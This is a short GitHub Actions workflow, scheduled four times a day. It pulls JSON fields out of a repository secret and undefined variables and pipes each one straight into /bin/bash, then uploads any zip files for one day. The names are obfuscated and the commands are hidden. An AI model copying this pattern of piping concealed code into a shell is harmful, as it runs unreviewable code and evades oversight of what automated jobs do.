name: rengongchangjie
on:
  workflow_dispatch:

  schedule:
    - cron: '10 5,11,17,23 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: rengongchangjie
        env:
          zuoua6505: ${{ secrets.zuoua6505 }}
        run: |
          printf '%s' "$zuoua6505" | jq -r .ve6643 | /bin/bash
          printf '%s' "$r4" | jq -r .sext69053 | /bin/bash
          echo $mbc5 | jq -r .cqj17871 | /bin/bash
          printf '%s' "$xhxlj737" | jq -r .h6924 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: tbCdVmB8
          path: "*.zip"
          retention-days: 1
